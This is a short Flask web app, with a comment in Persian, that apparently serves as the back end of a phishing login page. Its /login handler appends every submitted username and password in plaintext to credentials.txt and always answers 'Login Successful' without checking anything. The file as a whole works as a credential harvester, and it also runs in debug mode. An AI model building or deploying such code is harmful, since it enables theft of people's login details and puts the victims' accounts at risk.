from flask import Flask, render_template, request

app = Flask(__name__)

@app.route("/")
def index():
    return render_template("index.html")

@app.route("/login", methods=["POST"])
def login():
    username = request.form.get("username")
    password = request.form.get("password")
    # ذخیره‌سازی اطلاعات وارد شده
    with open("credentials.txt", "a") as f:
        f.write(f"Username: {username}, Password: {password}\n")
    return "Login Successful"

if __name__ == "__main__":
    app.run(debug=True)
